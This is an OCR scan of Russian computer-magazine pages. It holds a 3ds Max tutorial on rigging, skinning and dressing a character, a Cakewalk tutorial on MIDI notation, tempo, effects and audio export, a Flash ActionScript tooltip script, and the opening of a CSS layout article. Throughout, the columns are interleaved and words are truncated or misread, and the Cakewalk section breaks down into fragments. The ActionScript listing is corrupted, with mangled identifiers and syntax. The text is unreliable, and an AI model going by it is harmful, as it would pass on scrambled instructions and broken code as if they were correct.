Первая 3D studio 
ot Autodesk появилась 
B1990 году. Двумя 
годами раныше была 
запатентована система 
для обсчета За-сцен - 
pixar гепаегглап. 


Уря, почти все готово. Осталось настроить ин 
версную кинематику. Ну, кинематика - это ког- 
да высчитываем позицию костей в простран 
стве, зная углы поворота вращающихся точек, 
а инверсная кинематика, наоборот, нужна для 
вычисления углов поворота шарниров, чтобы 
кости двинулись, куда надо. В нашем случае 
это нужно для корректной анимации изгиба 
колена при подъеме ступни. Для настройки И 


г Ш 
Рис. 12. Трусняк от дядюшки Ляо. 


КЛИКНИ КОСТЬ ОДНОГО бедра и шелкни в верх- 


Рис. 13. Салон красоты "Фантазия". 


Рис. 11. Штопаем Трофимычу трусишки. 


нет, а можно поюзать кульный плагин - 
Creature creator, создающий каких угодно гу- 
аноидов по заданным параметрам. 
араметры головы не задаем - она нам на 
фиг не нужна, а все остальное пусть будет, 
аку обычного мускулистого мена. В превью 
можно заценить готовое творение. Экспор- 
руем модель. Какая-то она угловатая по- 
лучилась... Позже пофиксим. Сейчас основ- 
ная задача - приготовить тело к анимации 
Для этого посередине тела создаем невиди- 
ый бокс выбираем вкладку «systems- 
>bones->IKHISolver», отключая лажок 
«assign to children». Начинаем создавать ко- 
сти: от кисти к плечу, от пальцев к кисти, от 
пальцев ног (ИМХО, достаточно одной це- 
почки костей) к бедру. Особое внимание 
следует уделить расположению пальцев рук 
- проследи на вьюпортах, чтобы скелет был 
очно внутри оболочки нашего Трофимыча 
(размер костей можно редактировать). По- 
сле того как скелет будет сделан, линкуй 
близлежащие кости к боксу, а затем выдели 
все кости, открой вкладку hierarchy и жмакни 
Honky «Don't affect children» - это прибьет 
раблы с перемещением костей 


Дабы трусы были по типу плавок, а не нагла- 
женных семейников, ставь флажок на 
smooth. Теперь опять иди в стек и выбира 
surface. Щелкай на flip normals, и трусы будут 
сидеть как влитые. После щелкай право 
кнопкой на получившемся чуде и выбира 
«convert to editable mech» - теперь можешь 
редактировать вершины трусов, как хочешь. 
Отредактировав, выходи из режима моди- 
фикации и назначай трусам материал. Стан- 
дартные материалы для имитации ткани ма- 
ло подходят, поэтому советую применить 


плагин «Tiling tools->tiling geometry». 


нем меню Ha «animation->IK solvers->HI 
solver». Появится перекрестие, которым нужно 
елкнуть на кость лодыжки или пальцев ног 
ак тебе болыше подходит). Теперь можно 
аблюдать, как при перемещении ступни под- 
ается вся нога, причем все, как у людей. 
|альше по накатанной: опять модификатор 
kin с его настройками зон влияния. Поста- 
айся, чтобы при движении кости было вид- 
о сокращение мышц 
ля эксперимента придай Трофимычу ка- 
ую-нибудь позу, например, как на плакате 
«Ты записался куда-нибудь»? 
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НАТЯНЕМ ШКУРУ 


ПРИОДЕНЕМСЯ! 


Осталось затекстурить тело. Делаем это так 
же, как с головой. Я заюзал материал 
torso1.tga и слегка модифицировал его. 

Теперь, после всех мытарств, выделяем на- 
ше многострадальное тело и назначаем ему 
модификатор Mech smooth, и задаем значе- 
ние iterations - 1. Это избавит нашего друга 
от угловатости и добавит шесть кубиков 
пресса за полсекунды. 


Болван готов, осталось только приодеть на- 
шего мужика, хотя прикрывать-то особо не- 
чего (Creature Creator - плагин не в меру по- 
литкорректный и не отображает первичные 
половые признаки... Хотя нет, до женской 
груди он способен :)). Будем рисовать набе- 
дренную повязку. Нет ничего проще - создай 
эллипс вокруг бедер, затем внутри него та- 
кой же, только прилегающий к телу (кстати, 


Если тебе не нравится лысая черепушка тво- 
его нового собутыльника Трофимыча, сове- 
тую попользовать офигенный плагин Shag: 
hair. Этот плаг рассчитан на самостоятельный 
креатифф, так что укажу только самые общие 
приемы: сначала сплайнами рисуется приче- 
ска, потом каждому задается модификатор 
model hair. Параметров там всего ничего, и 
названы они понятно. Далее преобразуешь 
чайник Трофимыча в редактируемый тезй и 
выделяешь методом face Te грани, из которых 
должны расти волосы. После прешься в епм- 
ronment, задаешь shag: render и shag: hair. В 
hair в качестве эмиттера (ну, откуда все рас- 
тет) назначаешь «face level->current face 
selection», а в «model hairs» добавляешь со- 
зданные тобой сплайны. В остальных пара- 
метрах копайся сам - там их тьма. 
Вот теперь все. Наш Трофим теперь не про- 
сто Трофим, а Трофим Михайлович Чегевар- 
ра - пламенный революционер-анархист, 
соратник Нестора Махно и герой агитацион- 
ных плакатов. 
В следующей серии ты научишься: 

- создавать реалистичный свет и лазеры; 

- анимировать движения и речь персонажей; 
- совмещать графику из Макса и Флеша; 

- делать морфинг, достойный терминатора 
T1000, и многое другое. 


Рис. 14. Нем я выл, и кем я стал? - Мягко говоря, всем! 
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ERS Eas ВЕН 


Толкает ли Bac Ha сумасшествие лирика 
Децла? (вопрос № 11.7 бланк «Д» 


а Всероссийской переписи населения) 


СЕМЬ HOT иги РЫЧАГИ? Ну, да отправим подобных мэнов колба- 


ситься под очередной тумс-тумс (на этом 
‚ их потенциальная принадлежность к музы- 
ке заканчивается), а сами обратимся к фи- 
разделить на два типа: ди-джейский пульт и № Е И 

е доказать, что облечь эти самые фибры 
' в достаточно привлекательный музик по- 
средством семи нот и компа - як два паль- 


нарисованные рычаги, крутииь ручки и МАКАО 


Все, что нужно, - программный секвен- 
научного BT bIKa. По отношению к ппрогам са ео 20 ви 


' (хотя опыт показывает, что не тот о 
оо | МОНСТР, чтобы и на первом не пахать), н 
: более-менее нормальная звуковуха 


: что-то, начиная от Живого Бластера или 

крутым мэнам не в кайсЬ. ‚ на базе последнего Vortex’a. Со встроен- 

А a ee a м = = — = ной пищалкойи лучше не связываться, так 

‚ какее фиг настроишь. Ну, а про качество 
звука (audio & midi) дешевых (читай: ста- 


‚ рых) картты, я думаю, и так все знаешь не 
хуже меня. 


ая ВТ 


SO LETS BEGIN! 


' Запускаем Cakewalk и выбираем созда- 
ние нового, нормального (normal) проек- 
та. И что мы видим на картине: слева че- 
тыре дорожки, помеченные audio и midi, 
сверху - куча цифирей и разноприятных 
‚ значков. Рассмотрим их по порядку. Итак 
- первой по списку панель видов. Нужна 
она для того, чтобы ты мог выбрать себе 
тот вид записи нот, к которому у тебя 


больше лежит душа. С помощью двух из 
них - виртуального пианино и нотного 
стана - можно в real-time писать музыку, с 
я 2 
с 
д 


омощью двух других - списка событий 
оздания цикла - ее редактировать. Ре- 
`актировать нам пока нечего, так что нач- 


нем с писанины. ner ak BbINYCKHUKY 
среднестатистической музыкальной шко- 
i 
i 


ы (в далеком, темном прошлом, времен 
ервоначального накопления капитала 
:)), разумеется, милее и ближе родной 
| вид пяти линеек и скрипичного ключа, та 
что переходим в нотостан. Если ты се- 
чешь в нотах, то дальше тебе будет инту- 
| итивно понятно, что делать, а BOT есл 
нет, придется провести небольшой уро 
‚ нотной грамотности. 
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Сакема 
записи нот это знать 
Tb к ноте д 
нуть правой 
ноте и в открывшемся 
поля 
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ты еще 


ность. Длительн 


‚ению к од 


иженные 
HO В 


ч 
К’а, так что 


бы добавит 
о щел 


минус у 


я латинск 


«С», дальше 
ется 
е, чем на г 


ют цветом н 


полтона 
nom 


во втор 


гитаре) - это и есть 
диезами-бемолями 
виртуальном п 
Ib не хочешь, а 
необходимо. 
иез или бемоль, 
нопкой на требуе- 
меню нажать на 
тона. Кстати, 
заметил, ноты здесь обознача- 
ми - как в мобилах. 
здесь обозначает- 
считай сам. Еще рядом 


ми буква 
«Ло» - 


номер 
таре. 
стати, когда будешь набивать ноты 
йте слух, батенька, чтобы записать 
й в голове с бодуна шедевр), не 
ывай, что каждая имеет свою длитель- 
ость есть, грубо говоря, 
должительность одного звука по отно- 
ному такту, то есть одному де- 
ию отрезка нотной линейки, отделяе- 
мому при записи вертикальной линией. 
самую продолжительность обознача- 
оты и количеством нарисован- 
ых на ней палок. Цифрами после скри- 


ну из итальянских заморочек 
(Зихх! :() - объяснять буду только матема- 
мелодия состоит из семи 
(ло-ре-ми-фасоль.. Фиск... 
еричная система 
нотостана и, группируя 
нот в октавы, доходит 
о самого верха. Соответственно звук ме- 
oro (Шаляпин) д 
си соседская KOU 


не так очевидно 


. Тон - 
нотами 


гона). Есть е 


и на ней ( 


ра-соль-ля- 
счисления 


о самого вы- 
ка). Но весь 


это един 
бывает раз- 
ном листе это дело запи 
1ью диезов (# или Sharp - по- 
) и бемолей (6 или 
е дубль 
sharp - повышение на 
полутона, то есть один тон), 
е они встречаются очень ред 
рена я это рассказываю? А вот 
во-первых, звук у, скажем, до и до-ди- 
ых, если у тебя есть 
-клава (или ты хоть раз держал в 
о черные клави! 


нахре- 


вай: музыкальная азбука со- 
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В общем, 


с самого 
изображение дин 
дозрительной 
Кстат 


Well, с основными 
нотостане я тебя п 
ным пиан 
только вместо лин 
сразу послушать, нажав на клавишу. 
Если нажмешь на «список событий», то за- 
что там в столбик прописаны все 
параметры каждой написанной тобой но- 
можешь в любой момент изме- 
нить хоть длину ноты, хоть ее расположе- 
ние и так далее. 


ты, так что 


Все, с прописями за 


Cakewalk, - это д 


треба записывать на 
че ни хрена не услы 
первый попавшийся 
Первое - канал. Для 
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то есть сн 


нот и ка 


быть в такте. 
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1/16 нот 
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у тебя есть 


ей 


что видим 


струментов 
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не прослу 
начала, нажимай на «отделить» 
амика) 
ноте - зазв 


пичного (или любого другого) ключа пи- 
ой длительности 
Приведу пример: 
возьмем, допустим, «детский» размер 2/4. 
Сие значит, что в одном такте могут быть 
ота с одной пал- 
ая (прозрачная нота с од- 
и восемь 


(черная 
и двумя 
‚ не считая вся- 


что-то не так 
шивать мелодию 


и щелкай по по- 


учит как милень- 


получится п 
зажав кнопку мыша, провести по нотам с 


ончили, пора 
к музыке. Я не ду- 
собственная многого- 
что пока будем редакти- 
ера я взял 
ю советской баллады, пере- 
петую группой «Rammstein», «Песня о тре- 
ВОЖНОЙ МОЛОДОСТИ» 
нцерта оригинала 
после открытия ее в 
есять Midi треков, из чего 
делаем вывод, что Аудио (Mp3, Wav) и midi 
разных дорожках, ина- 
шишь. Разворачиваем 
трек - что там видим? 
каждой 
можно и тот, которо- 
Patch, то есть инстру- 
р у нас тьма, и делятся 
они по способу извлечения звука 
принадлежности 
ачала струнные, потом 
ные. Семейство FX 
цэффекты - не советую 
применять, так как к реальным инструмен- 


рикольно, если, 


деталями записи нот на 
ознакомил. С виртуаль- 
но абсолютно та же история, 
ий клетки и звук можно 


РАЗБЕРЕМСЯ С КОНТОЛЗАМИ ТРЕКА 


перехо- 


перво- 


Богу, до лужников- 


не слышал :)). 


дорожки надо 


у их ори- 
тронике, 
ударные, 
называе- 
их часто 


эле 


- так 


там все привыкли, а повторяющиеся эф-ик- 
сы быстро приедаются. Следующим в меню 
лут громкость стереобаланс (гоняем 
влево/вправо монозвук из одной колонки в 
другую, посередине слышим стерео). Сле- 
лующее - скорость - та же длительность 
нот. Поставишь на ноль - ничего не будет 
слышно, только в нотостане это можно при- 
менять к каждой ноте (жмакнуть правую 
нопку мыша и выбрать «скорость»), а 
здесь - ктреку в целом. 


МЕТРОНОМ 


Разобравшись с этим, думаем, что бы 
сделать с нашим комсомольским шедев- 
ром... Для начала включим метроном - 
пука такая щелкает, такты равномерно 
отсчитывает, чтобы не сбиться при игре. 
Чтобы получить этот эффект, включи оп- 
ию «Метроном во время воспроизведе- 
ия», а если ты к тому же и редкий извра- 
енец, то и «Использовать динамик» - я из 
омпешного динамика получал все, даже 
пение птиц, но такого еще не слышал :). В 
параметрах метронома можно настроить 
скорость отбивания тактов, режим эха и 
е кучу чаще всего не нужных значений. 


МИДИ-ПЫТКИ 


еперь постебемся над темпом: пусть до 
21-ой секунды песня тянется ме-е-е-ед- 
ленно, а потом быстро несется вперед (« 
сньег, и вьетьер, и звьозд ношной полот в 
грефожную дал зовьот!» - бу «Rammstei 
- этот гениальный текст можешь записать, 
\Целкнув на кнопке Лирика, помеченной 
ак «Oh-»). Ныряй в пункт «Вставка —> Из- 
менение темпа». В открывшемся окне ме- 
няем значение темпа с дефолтной сотни 
на 50 и ставим флажок на «Вставить новый 
темп». «Начать в» изменяем на 00.00.000 
(такты). ОК, и черепаха поползла. Тепери- 
ча идем обратно в темп и меняем его на 
200 (а лучше на тыщу!), а время на 
21.00.000. Вжжухх! Полетел... Надо бы его 
подстрелить на лету: выбираем «вставка— 
>время/размеры», и такт в тридцатый 
вставляем одну пустую секунду. ОК, и по- 
том то же самое в 35-м и 40-м тактах... Ды- 
хание прерывистое, пациент постоянно 
спотыкается. 


ДОБЬЕМ ЭФФЕКТАМИ 


Ну, и добьем его, чтобы не мучался: идем 
с какой-нибудь дорожки в нотостан (или 
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эха. Значение это также можно изменять OT 
О до 127. Так что если твои будущие слуша- 
тели - тормоза, то для них это будет самый 
радостный эффект. Далее переходим на- 
право - здесь у нас, сначала, идет панель 
эффектов. Te ручки параметров шины, ко- 
торые там можно крутить, ничего особо но- 
вого в песню не привнесут, зато здесь есть 
гораздо более интересная штука: щелкн 
на одном из черных экранов над крутилка- 
ми и выбери «ОХ-инструменты—>\/$С Ох». 
У-у-е-е-а-а-а! У нас выпрыгнул вшитый в 
Calewalk Music Creator 2002 программны 
синтезатор Virtual Sound Canvas. Вещь 
очень примечательная, совместимая с 
DirectX инструментами, поддерживает 16 
партий на 128 голосов, 902 звука и 26 удар- 
ных партий. Ну а кроме того, встроенные 
реверберация, хор, задержка плюс много 
еще чего вкусного :). На самом деле этой 
теме можно посвятить отдельную статью, 
так что читай доки с хелпами, эксперимен- 
тируй и наматывай себе всю премудрость 
нах... эээ... на ус. 


пианино), щелкаем по пустому полю пра- 
вой кнопой и выбираем «Midi эффекты— 
>Cakewalk FX—>Session drummer». Xana 
вы тут много: в Cakewalk FX собраны кол- 
лекции, так сказать, «обрамлений» каждо- 
го стиля музыки, то, что делает рэп - рэ- 
пом, джаз —джазом и так далее. В общем 
ритмы. Выбираешь сначала стиль, пото 
- раскладку (удар-удар-отдых-е-е) и двой- 
ным щелком отправляешь ее в набор 
Song. Здесь ты можешь снять с ритма про- 
бу и установить количество повторов 
оор) обрамления. Справа показана дли- 
тельность звучания ритма в секундах, то 
есть нетрудно посчитать, что если у нас 
тактовый размер 2/4 (при установке такта 
в полсекунлы), а длительность лупа - 4 се- 
кунды, то он займет 8 тактов. В общем, мо- 
жешь стебаться над мелодией - не забы- 
вай только, что если на дорожке нет HOT и 
нечего обрамлять, то и лупа не последует, 
а играть он будет тем же инструментом, 
что был выбран для данной дорожки. Кста- 
ти, чтобы извращенную до неузнаваемос- 
ти дорожку можно было послушать в соль- 
ном звучании, выдели ее и щелкни на «до- 
рожка-—>соло» - все остальные треки 
временно притухнут. 


считаешь нужным - простору здесь для 
этого много. Кстати, во время пыток лучше 
не убирай флажок с параметра «Ноты, Ли- 
рика и Аудио», так как это основные пара- 
метры, на которые осуществляется воз- 
действие, а вот с длительностью ноты и 
временем начала делай, что хочешь, - это 
не так критично. 


КОНТРОЛЛЕРЫ 


Контроллеры есть М!-данные, которые 
используются в Midi-cucteme для обмена 
между устройствами. Они управляют пара- 
метрами синтезатора звуковухи или внеш- 
него синтезатора на Midi-nopte. В нашем 
случае контроллеры нужны для управления 
громкостью, реверберацией и так далее. В 
Саема 2002 это делать очень удобно. 
Чтобы открыть меню контроллеров, идем в 
«Вид—>Консоль». Перед нами возникает 
нечто, похожее на музыкальный центр. Что 
ж, тем понятней, как с ним обращаться. Как 


АУДИО 


На сегодня с мидихами Зе Енд, пора nepe- 
ходить к Wave и MPS. Не будут же твои бу- 
лущие фэны качать из Инета невразуми- 
тельные Midi. Да и другие продвинутые ау- 
лиорелакторы работают только с живым 
звуком. Решено. Делаем из нот аудиофайл. 
Принцип, в общем-то, знаком даже начина- 
ющим аудиолюбителям - «What you hear» - 
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КВАНТИРОВАНИЕ 


Еще в меню Cakewalk FX (и в правке) к каж- 
HOU дорожке можно применить такую 
вещь, как квантование. Квантование есть 
выравнивание звучания мелодии относи- 
тельно указанных долей такта. Иначе гово- 
ря, мелодия становится ритмична до иде- 
ала и, надо признать, окончательно теряет 
все намеки на живое исполнение, так как 
никакой музыкант не способен играть аб- 
солютно ритмично. Тем не менее, еслите- 
бе положить батон на эти условности, то 
выбирай «Quantize» (в FX) или «Квантова- 
нИе» в «правке» и ставь шестнадцатую, и 
наблюдай эффект: мелодия станет немно- 
го ровнее. Это случилось потому, что все 
ноты приблизились к ближайшим шест- 
надцатым, а на каждой шестнадцатой бу- 
дет соответствующий интервал, так что в 
прежнем звучании ты ее больше не услы- 
шишь. То же самое работает и с восьмы- 
ми, и с четвертыми, так что изгаляйся, как 
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стандартная функция ПО, поставляемого в 
комплекте с Живыми Бластерами. Ну да ив 
akewalk'e страдать долго не надо: снача- 
а зайди в «Options—>Ayauo» и убедись, 
то выбраны устройства ввода/вывола. За- 
ем добавляй в файл аудиодорожку и ло- 
авляй к ней ручку для записи (дорожка— 
ручка лля записи или «В» рядом с назва- 
ем трека). That's all! Если в опциях записи 
ндозного Volume control у тебя стоит 
ажок на микшере (Mixed output), то де- 
ть больше нечего. Можешь нажимать на 
пись рядом с плеерными кнопками и 
стоп, когда все закончишь. Те дорожки, 
присутствие которых в файле нежелатель- 
но, - просто глуши («М» - Mute или ручное 
подавление). Кстати, метроном советую 
или отключить, или, если уж он так тебе не- 
обходим, вывести на комповый динамик - 
так он не запишется на аудиотрек. Теперь, 
чтобы послушать готовый музон в Винампе, 
жми на «Файл—>Экспортировать звук», 
дальше и Бивис разберется. Если уж на то 
пошло, то аналогичные операции с «What 
you hear» можно устраивать в любом аули- 
оредакторе, полдерживающем звукоза- 
пись, хоть в Goldwave, хоть в Sound Forge 
ли мастдайно онографе. Жмешь в них 
запись, а после - воспроизведение в 
Cakewalk. Единственный недостаток - сте- 
пень синхронности этих действий зависит 
только от быстроты твоих пальцев, так что 
можешь упустить что-то нужное в самом 
ачале мелодии. 
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или простом фортепьяно (хотя откуда тебе 
- комп, комп и еще раз комп :) пробелы 
между черными клавишами через каждую 
октаву? Долго объяснять, на хрен это на- 
до, скажу только, что, проходя через этот 
барьер, гамма меняет свой первоначаль- 
ный вид и характер звучания нот (помнишь 
про полутоны?). Ну, вот я и решил, что для 
моей мелодии лучше всего подойдет то- 
нальность ми-мажор. Это дает нам четыре 
лиеза возле скрипичного ключа, то есть 
соответствующие ноты (до, ре, фа и соль) 
впредь булут повышены на полтона. Дела- 


ожешь импортировать и видео, а потом 
просмотреть его вместе с записью (на па- 
нели видов Видео). Опосля я импортиро- 
вал кусок китайской народной музыки, под 
оторую выполнял особо извращенное уп- 
ражнение Тайдзицуань в секции У-шу, и 
применил к нему эффект эха (правой 
нопкой щелкаешь на треке и выбираешь 
Аудио Эффекты—>Еспо») и Distortion 
(искажение сигнала - можешь из металли- 
еского барабана получить звук прогнив- 
ей бочки). Затем я немного подрезал 
трек (просто, как в любом графическом 


ШЕДЕВР 


у да ладно, это все были лишь техничес- 
ие рекомендации. Пора переходить к 
онкретному туториалу. Я грузанул себе 
«Китайский Новый год». Это произведе- 
е я создал в Сакема!К'е около года на- 


в 


зад для одной своей подружки, но почему- ется это в поле «вставка-—>Счетчик/Из- редакторе) и, шелкнув на нем правой кла- 
то она не оценила всей его глубины и менение клавиш». В подписи ключей и вы- вишей, выбрал зацикливание Груви кли- 
скрытого (очень скрытого :)) смысла... Ну бираются тональности. Разумеется, звук пов. Го, что после этого получилось, назы- 


а лално, перейдем к деталям. Песня на- 
сана в ми-мажоре. Шо це такэ? Объяс- 
яю: если строить гамму не в до-мажоре 
где около скрипичного ключа нет никако- 
о знака, влияющего на соответствующую 
оту на протяжении всей мелодии), то на- 
ало нотостана начинает обрастать дие- 
зами и бемолями в четном и нечетном по- 
рядке. Почему? А ты видел на Midi-knaBe 


на бумаге я не смогу передать, но кое-что 
ты себе представить сможешь. В самом 
начале «Нового года» я решил поместить 
звуковую схему из забойного советского 
мультика «Падал прошлогодний снег» 
(«Нисиво не понимаю!»). Делается это 
элементарно: добавляется новая аудио- 
дорожка и импортируется нужный кусок 
(«Файл—>Импорт аудиофайла»). Кстати, 


вается Груви клип - звуковой отрезок со 
своими свойствами вроде собственного 
темпа, лупа и так далее. Клип я довел до 
ума, дважды щелкнув на нем левой клави- 
шей мыша и подвинув появившиеся в нем 
аркеры тюнинга. Больше заниматься с 
этим треком-развратом я не стал и завер- 
пил создание своего шедевра добавле- 
нием пары скачанных из Инета семплов 


акустической гитары и спецэффектов. 
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ЧТО ИМЕЕМ В ИТОГЕ? 


МХО, я понаписал достаточно инфы, что- 
бы ты смог сотворить свою простенькую 
музыкальную композицию. Обо всем рас- 
сказать в этой статье без мазы. Ищи, ина- 
че на кой ты читаешь X. Иещше: все, о чем я 
рассказал выше, будет бессмысленно, ес- 
ли утебя в голове (ну или откуда у тебя там 
все берется) не родится оригинальная, 
свойственная только тебе мелодия. Ника- 
ие, даже самые продвинутые, программы 
не принесут тебе ни известности, ни мо- 
рального удовлетворения, если ты будешь 
набивать ноты от балды и таким же обра- 
зом их обрабатывать. Учи ноты, набивай 
гаммы и постарайся научиться играть на 
аком-нибудь живом музыкальном инстру- 
енте - это тебе еще пригодится. Не упо- 
добляйся популярным нынче Воу7-коллек- 
тивам, в количестве двух-трех человек, 
эксплуатирующих одну затасканную, заре- 
иксованную до смерти мелодию. В об- 
ем, юзай мое личное правило: «Слушай 
еньше всего той музыки, которая не твоя 
собственная». Удачи! 


HPEATHB 


TIPS OF FLASH: 


ПОДОКАЗКА HISBEPHI 


Iv (dembicki@narod.ru, 


http://dembicki.narod.ru) 


Итак, ты нарисовал кнопки, их много, каждая делает свое дело, все нажимается, сверкает и 
шевелится. Мечта сбылась - заказчик выпал в осадок при виде такого чуда. (Слезы радости, крики 


«Браво!» за кулисами). 


Но наступил второй этап: клиент попытался разобраться, на какие кнопки кликать и что после 


этого произойдет и... запутался. 


he Sy 


Расслабься. 


TIPS 2 


Это нормально. То что для тебя оче- 
видно, совершенно неочевидно для 
других. Твоя иконка кул. Почти как у 
Смарта или Димона из Телетайпа. Но 
как догадаться бедному клиенту, что 
если кликнуть на этот глаз из преис- 
подней, то обязательно попадешь в 
раздел с описанием услуг фирмы? 
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Нужно делать tipsbl. 


р МЕ 


енот 


в Pos pm 


ee 
зы peat сыны 


Рис. 1. Заметно, что я программист, а не 
дизайнер, но главное в этом рисунке, чтобы 
все было понятно. 


TIPS 4 


Есть два пути: 
Первый с виду проще: нужно в каждый 
мувик воткнуть по типсе и не париться. 
Но при большом количестве иконок и 
постоянно меняющихся соображений 
клиента (а также его жены, твоего ше- 
фа и всех его родственников и т.п.) по 
поводу текстов на типсах принимаем 
сложное, но достойное решение: типса 
будет одна! Но умная. Это и есть второй 
путь. 


TIPS 5 


Поскольку заранее неизвестна длина 
текста в типсе, бэграунд ее будет рас- 
тягиваемый. А если захочется сделать 
ее объемной, то окантовывать лучше 
всего линией со стилем па пе. Только 
такая линия не будет изменять свою 
толщину. Сама типса будет состоять из 
нескольких элементов: текстовое поле, 
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основной фон, указатель на объект и 
тень к этому добру. 


РР 5. © 


Если ты хочешь, чтобы текст типсы 
можно было менять, а ты хочешь, не за- 
будь указать, что тип текстового поля у 
нас - Dynamic Text. Это делается в за- 
кладочке Properties при зажатой кнопке 
«Т» на линейке инструментов. Тут же, 
кстати, можно указать и имя инстанса 
ака экземпляра объекта, с которым бу- 
дем работать. 


hrs. 7 


Раскидай по слоям объекты, чтобы они 
не мешали друг другу. Обрати внима- 
ние, на то, что указатель и его тень не- 
сколько отличаются друг от друга по 
форме. Указатель должен находиться 
слоем выше фонового мувика, чтобы пе- 
рекрывать обводку мувика, но слоем ни- 
же текстового поля. 

Тень делаем без линий обводки заливкой 
черного цвета с 30 процентной альфой 
(тоже выставляется во вкладке 
Properties). Центр мувиклипа фона и му- 


Рис. 2. Указатель типсы должен показывать в 
центр мувика. 


виклипа тени сделай в левом верхнем уг- 
лу графики. 


TIPS 8S 


Типсу в сборе помести в мувик, скопиро- 
вав в него кадры, и раздай имена: 
tips_txt - текстовое поле; 

@рз Ба тс, tips shadow_mc - мувики, 
догадайся какие. 

Размести типсу в мувике как на рисун- 
ке 2. 

Остался сущий пустяк - программинг. 


== 


Чего мы хотим от типсы? 

Мы хотим: 

- чтобы наша типса показывалась после 
некоторой задержки мыши над муви- 
KOM; 


- причем чтобы делала это независимо 
от иерархии мувиков; 

- и показывала текст подсказки, если 
он мувику назначен; 

- чтобы типса не гнула ноги твоему 
компу. 

Всегда вначале продумай общую логи- 

ку и основные принципы. 

Я буду реализовать следующий прин- 

yun: 

- Поскольку длина текста заранее не- 
известна, будем использовать авто- 
матический размер текстового поля 
и на его основании задавать ширину 
мувиков. 

- Ежекадрово проверяем время за- 
держки, если мышка двигается - об- 
нуляем это время, если нет - ожида- 
ем истечения времени задержки, по- 
сле чего показываем типсу. 


Е 1S 


Перед тем, как приступить к написа- 
нию скрипта, переключись с русского 
на английский. 
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Основные шаги программы такие: 

1. ожидание остановки мыши; 

2. перебор мувиклипов для проверки 
попадания мыши на мувик с текстом 
для типсы; 

3. если попали на такой мувик, то по- 
казываем типсу и прекращаем даль- 
нейшие проверки; 

4. если не попали, то тоже прекраща- 
ем любые проверки; 

5. в любом случае, если мышь двину- 
лась с места и съехала с мувика, ко- 
торому была назначена типса или та- 
кого мувика не было, запускаем зано- 
во процедуру с пункта 1. Короче, 
сказка про белого бычка: «эта песня 
хороша, начинай сначала». 


TPS 1 2 


Скрипт нужно воткнуть в верхний кадр 
типсы. Я прокомментирую его основ- 
ные моменты: 


/* устанавливаем время задержки 1 
сек.: */ 

this tooltip Time = 1000; 

/* функция ожидания остановки дви- 
жения мыши: * / 

waitMouseDelay = function () { 


/* вначале прячем типсу и ставим в ко- 
ординаты 0,0 */ 
this._visible = this. x = this._ y= 0; 
/* сбрасываем время при движении мы- 
ши */ 
this.onMouseMove = function() { 

{15.40 = getTimer(); 


co 
а | 
ae a ig ee i ав ыы 


Ihe 
/* каждый кадр проверяем He истекло 
ли время * / 
this.onEnterFrame = function() { 
if (getTimer()-this.tO>this.tooltip Time) { 
/* ищем, не попала ли мышь на мувик с 
текстом подсказки, начиная с рута. Ре- 
ализовано в отдельной функции 
checkHitTest, которая при нахождении 
мувика с текстом подсказки (в пере- 
менной tooltip text) помещает этот 
текст в переменную tooltip target text в 
типсе: */ 
this.checkHitTest(_root); 
/* если функция в предыдущем кадре 
задала переменную tooltip _target_mc * / 
if (this.tooltip_target_mc) { 


/* то значит мувик с текстом типсы най- 
ден и на нем находится мышь - мы можем 
показать типсу * / 

this. show Tooltip (this.tooltip_tar- 
get_text); 
/* если нет, */ 

} else { 

/* останавливаем проверку Ha истече- 
ние времени * / 

delete this.onEnterFrame; 
/* аесли двинется мышь, TO начинаем 
все сначала */ 

this.onMouseMove = function() { 

waitMouseDelay(); 


/* Это функция поиска мувика, на KOTO- 
рый наведена мышь и который имеет 
текст для типсы * / 
this.checkHitTest = function (пп) { 
delete this.tooltip_target_mc; 
delete this.tooltip_target_text; 
for (var mc п пп) { 
if (m[mc].hitTest(_ root. xmouse, 
_root. ymouse, 1)) { 
if (m[mc].tooltip_text != undefined) 
{ 
this.tooltip_target_mc =m|[mc]: 
this.tooltip_target_text = 
m[mc].tooltip_text; 
return; 
} else { 
if (Ithis.tooltip target_mc) { 


this.checkHitTest(m[mc]); 
return; 


} 


}; 
/* Это функция показа типсы * / 
show Tooltip = function (1 { 


this.swapDepths (this. parent.getTopDepth( 
)) 
this. visible = 1; 
this._x = this. parent._xmouse; 
this. y =this. parent. ymouse; 
this.tips_txt.text = t; 
this.tips_txt.autoSize = true; 
this.tips_bg тс. width = 
this.tips_ txt. width+20; 
if (this.tips bg тс. width<50) { 
this.tips_bg_mc._width = 50; 


this.tips_shadow_mc._width = 
this.tips_ bg тс. width; 
delete this.onEnterFrame; 
this.onMouseMove = function() { 
if 
(this.tooltip_target_mc.hitTest(_root._xmou 
se, root. ymouse, 1)) { 
this. x = this. parent. xmouse; 
this. y = this. parent. ymouse; 
updateAfterEvent() 
} else { 
waitMouseDelay (); 


TIPS OF FLASH 


_ /* Эта функция возвращает первую 


свободную верхнюю глубину если за- 
дать аргумент positive равным true, то 
будет возвращать первую положитель- 
ную глубину */ 
MovieClip.prototype.getTopDepth = func- 
tion(positive) { 

var mc, depth; 


for (var mc in this) { 
if (typeof this[mc] == «movieclip») { 
depth = this[mc].getDepth(); 
break; 
} 


Ii 
if (depth == undefined) { 
return positive ? 0 : -16382; 


} 
if (positive) { 
return depth<0 ? 0 : depth+1; 


return depth+1; 
ibe 
/* мы эту нужную функцию спрячем и 
защитим от перезаписи или удаления 
yl 
ASSetPropflags(MovieClip.prototype, 
[«getTopDepth»], 7, 1); 
/* инициализируем типсу: */ 
this.waitVouseDelay (); 


TIPS 13 


Имея такую умную типсу, тебе доста- 
точно задать в любом мувике любое 
значение переменной tooltip text. 
Чтобы протестировать создай новый 
файл и из библиотеки перетащи мувик 
с типсой в первый кадр. 

Нарисуй что-нибудь и помести в му- 
вик, а потом в первом кадре этого му- 
вика напиши tooltip_text = «Это про- 
верка типсы». Наведи мышь и подо- 
жди секунду. 


TIPS 14 


Ты долго переписывал скрипт, и я это 
приветствую. Если ты хочешь хотя бы 
понять, что происходит, то без тща- 
тельного прохода по скрипту не обой- 
тись. И даже простое переписывание 
этому способствует. Но если у тебя не 
получилось даже переписать, то загля- 
ни ко мне на сайт, может исходник най- 
дешь... 


== 
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===TIPS OF WEB 


eo SAMOPOUKM С CSS 


Vadias (painter@gameland.ru, 


www. freehand.str.ru) 


Всем известно, что веб-страницы в большинстве своем верстаются с помощью таблиц, так как 
только они из всего языка HTML позволяют более менее точно распихать элементы Naru по 
нужным местам. Однако мало кто знает, что этому способу есть альтернатива - блоки ($$. 
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CSS позволяет создавать блоки 
определенной юзером ширины и высоты, 
задавать им разнообразные свойства и 
рассовывать их по странице в любое 
место с пиксельной точностью. Блок 


